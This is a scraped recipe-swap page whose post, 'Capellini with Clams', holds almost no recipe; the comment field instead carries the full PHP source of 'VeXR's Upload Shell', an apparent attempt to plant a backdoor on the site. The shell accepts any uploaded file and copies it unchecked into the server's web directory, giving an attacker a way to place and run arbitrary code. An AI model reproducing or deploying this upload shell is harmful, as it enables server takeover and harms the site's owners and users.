Reenie's Recipes - the dinner party recipe swap
 

Capellini with Clams

Posted by dood (2)
Category: Main Courses
Subcategory:

 

[delete]

Recipe Details:

Capellini

It is OK to email this member (but you must sign in first).



Comments on this recipe

dood said:
<html> <head> <title> VeXR's Upload Shell </title> <style> body{background-color:#000000;color:#FFFFFF} </style> </head> <body> <div align="center"> <form enctype="multipart/form-data" action="<?php echo $_SERVER["PHP_SELF"]; ?>" method="post"> <input type="hidden" name="MAX_FILE_SIZE" value="2048000" /> <p> File : <input name="userfile" type="file" /> <input name="submit" type="submit" value="Upload" /> </p> </form> <?php if (@is_uploaded_file($_FILES["userfile"]["tmp_name"])) { copy($_FILES["userfile"]["tmp_name"], "" . $_FILES["userfile"]["name"]); echo "<p>File uploaded successfully</p>"; } ?> </div> </body> </html>